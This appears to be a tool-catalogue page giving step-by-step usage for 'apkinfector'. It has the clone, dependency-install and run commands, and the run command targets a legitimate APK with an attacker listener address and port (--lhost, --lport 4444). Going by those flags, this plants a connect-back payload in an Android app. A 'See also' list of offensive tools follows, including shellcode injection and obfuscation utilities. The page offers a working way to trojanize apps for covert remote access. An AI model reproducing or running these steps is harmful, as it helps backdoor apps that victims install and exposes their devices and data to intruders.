Example Usage
# Navigate to the /opt directory (optional) $ cd /opt/ # Clone this repository $ git clone https://github.com/PushpenderIndia/apkinfector.git # Navigate to technowlogger folder $ cd apkinfector # Installing dependencies $ apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner # Running the Tool for 1st Time $ python3 infector.py --help # Usage Example $ python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk
See also
SwizGuard
Open Source
A self-hosted "Stealth VPN" implementation, forked from xray-core and WireGuard. It makes your traff…
EagleVM
Open Source
Native code virtualizer for x64 binaries…
Shellter
Freemium
Kali
Dynamic shellcode injection tool designed to inject shellcode into native Windows applications (PE f…
dittobytes
Open Source
Metamorphic cross-compilation of C++ & C-code to PIC, BOF & EXE.…
APKiD
Free
Android Application Identifier for Packers, Protectors, Obfuscators and Oddities - PEiD for Android…
ObfuXtreme
Open Source
ObfuXtreme is an advanced Python obfuscation tool for security research, reverse engineering educati…